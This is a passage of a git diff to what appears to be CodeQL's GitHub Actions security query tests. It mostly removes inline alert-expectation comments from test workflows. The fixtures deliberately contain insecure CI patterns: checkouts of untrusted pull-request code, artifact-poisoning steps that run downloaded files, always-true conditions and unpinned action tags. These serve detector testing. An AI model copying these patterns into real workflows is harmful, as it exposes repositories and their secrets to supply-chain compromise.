.github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref index c4a686750f37..f924f8fe750c 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref index 67d2bf06c396..6284c786b3ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -1,2 +1 @@ -query: Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index e3b1c4047f8a..bbbcc5aaa791 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -16,7 +16,7 @@ jobs: ${{ 1 == 2 || 3 == 4 - }} # $ Alert[actions/if-expression-always-true/high] + }} run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ 1 == 2 }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ 1 == 2 }} # $ Alert[actions/if-expression-always-true/high] + if: ${{ 1 == 1 }} ${{ 1 == 2 }} run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ 1 == 2 || - 3 == 4 }} # $ Alert[actions/if-expression-always-true/high] + 3 == 4 }} - name: Test 9 if: '${{ 1 == 2 }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{1 == 2 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] + if: " ${{ 1 == 2 }}" run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ 1 == 2 }}" # $ Alert[actions/if-expression-always-true/high] + if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || 1 == 2 - )}} # $ Alert[actions/if-expression-always-true/high] + )}} run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || 1 == 2 - )}} # $ Alert[actions/if-expression-always-true/high] + )}} run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.event_name }} == 'foo' # $ Alert[actions/if-expression-always-true/high] + if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' # $ Alert[actions/if-expression-always-true/high] + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" # $ Alert[actions/if-expression-always-true/high] + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.event.workflow_run.event == 'pull_request' && - github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/high] + github.event.workflow_run.conclusion == 'success' }} run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml index 10688938a010..8b863037e29b 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml +++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -16,7 +16,7 @@ jobs: ${{ github.actor == "foo" || 3 == 4 - }} # $ Alert[actions/if-expression-always-true/critical] + }} run: echo "Test 2 should not be printed" - name: Test 3 if: ${{ github.actor == "foo" }} @@ -31,7 +31,7 @@ jobs: }} run: echo "Test 5 should not be printed" - name: Test 6 - if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} # $ Alert[actions/if-expression-always-true/critical] + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} run: echo "Test 6 should not be printed" - name: Test 7 run: echo "Test 7 should not be printed" @@ -45,7 +45,7 @@ jobs: if: > ${{ github.actor == "foo" || - 3 == 4 }} # $ Alert[actions/if-expression-always-true/critical] + 3 == 4 }} - name: Test 9 if: '${{ github.actor == "foo" }}' run: echo "Test 9 should not be printed" @@ -53,10 +53,10 @@ jobs: if: "${{ github.actor == 111 }}" run: echo "Test 10 should not be printed" - name: Test 11 - if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] + if: " ${{ github.actor == 111 }}" run: echo "Test 11 should not be printed" - name: Test 12 - if: " ${{ github.actor == 111 }}" # $ Alert[actions/if-expression-always-true/critical] + if: " ${{ github.actor == 111 }}" run: echo "Test 12 should not be printed" - name: Test 13 if: | @@ -79,27 +79,27 @@ jobs: if: |+ ${{( false || github.actor == "foo" - )}} # $ Alert[actions/if-expression-always-true/critical] + )}} run: echo "Test 16 should not be printed" - name: Test 17 if: >+ ${{( false || github.actor == "foo" - )}} # $ Alert[actions/if-expression-always-true/critical] + )}} run: echo "Test 17 should not be printed" - name: Test 18 - if: ${{ github.actor }} == 'foo' # $ Alert[actions/if-expression-always-true/critical] + if: ${{ github.actor }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' # $ Alert[actions/if-expression-always-true/critical] + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' run: echo "Test 19 should not be printed" - name: Test 20 - if: ${{ github.actor }} != "" # $ Alert[actions/if-expression-always-true/critical] + if: ${{ github.actor }} != "" run: echo "Test 20 should not be printed" - name: Test 21 if: > ${{ github.actor == 'foo' && - github.event.workflow_run.conclusion == 'success' }} # $ Alert[actions/if-expression-always-true/critical] + github.event.workflow_run.conclusion == 'success' }} run: echo "Test 21 should not be printed" - name: Test 22 if: | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref index 0c665471cafc..823f802a70f2 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref index 546bb9dd0c9a..f12135bd1b88 100644 --- a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -1,2 +1 @@ -query: Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml index 47151cec6dea..cd4f0fe660aa 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml @@ -8,6 +8,6 @@ runs: with: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 2 - - run: echo "foo" # $ Alert[actions/untrusted-checkout/critical] + - run: echo "foo" shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml index ad2a67b14bb3..4241647d3e11 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | # $ Alert[actions/artifact-poisoning/critical] Alert[actions/unversioned-immutable-action] + - run: | mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml index ac4364695ee4..0c2059521020 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml @@ -22,7 +22,7 @@ runs: }); let fs = require('fs'); fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data)); - - run: | # $ Alert[actions/unversioned-immutable-action] + - run: | mkdir -p /tmp/artifacts unzip /tmp/artifacts.zip -d /tmp/artifacts shell: bash diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml index db50d733137b..782505cc698d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/unpinned-tag/action.yml @@ -2,5 +2,5 @@ name: Composite unpinned tag test runs: using: "composite" steps: - - uses: foo/bar@v2 # $ Alert[actions/unpinned-tag] + - uses: foo/bar@v2 - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml index 369412a9c4d1..08a25646d6ae 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml @@ -16,11 +16,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml index 42322833ce72..7eaee9fa6d38 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml @@ -8,12 +8,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + uses: dawidd6/action-download-artifact@v2 with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - id: pr_number # $ Alert[actions/artifact-poisoning/critical] + - id: pr_number run: | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt) - echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT # $ Sink[actions/artifact-poisoning/critical] + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml index 44e8a18d733f..f8d3736dba51 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml @@ -29,13 +29,13 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip sonarcloud-data.zip -d sonarcloud-data ls -a sonarcloud-data - name: Run command run: - ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical] + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index 953d06f55c71..aa884b7eca74 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -29,12 +29,12 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip sonarcloud-data.zip ls -a sonarcloud-data - name: Run command run: - python foo/x.py # $ Sink[actions/artifact-poisoning/critical] + python foo/x.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 81f42aa335b7..e73548895d37 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml @@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name workflow: wf.yml path: foo - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] + sh foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ca69571fab22..ac970fff8404 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name workflow: wf.yml - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: sh cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: sh cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index d08b18147fe8..0e7c6f97cf5d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] + run: ./foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index a573db866bda..7a837ee42d2c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] + ./bar/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index b40091d7808f..39ec063c7b64 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] + ./bar/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index b4319fd42f99..905a4eaccb17 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/artifact-poisoning/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index 645fe636d3e6..afa3e15132e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: ./foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index 24fef012e0e3..d3100d46edc7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: ./cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 4430b91fba94..8cb380ae0436 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + uses: dawidd6/action-download-artifact@v2 with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] + - name: Use artifact run: | - sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] + sed -f config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 5a6bf1d62254..399adf3dff77 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | # $ Alert[actions/untrusted-checkout/medium] + - run: | bash script.sh - uses: actions/upload-artifact@v4 with: @@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] + - run: python test.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index 184661fda499..af9f01b572f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/download-artifact - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/install-deps - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index 806b99204678..e35bc73c3bda 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/download-artifact-2 - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index 6498802afc9c..f970a3fa1979 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file + - run: npm install \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 7093027c4d91..28ffab637f03 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] + - name: Set up Python ${{ env.min-python-version }} uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] + - name: Lint with flake8 run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: # $ Sink[actions/untrusted-checkout/critical] + test: permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] + - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] + - name: Run unittest tests with coverage run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] - uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 - name: Stage new files and commit id: stage_files @@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] + uses: peter-evans/create-pull-request@v5 with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] + uses: thollander/actions-comment-pull-request@v2 with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index a905b6b9d668..072eae4b1d2a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ 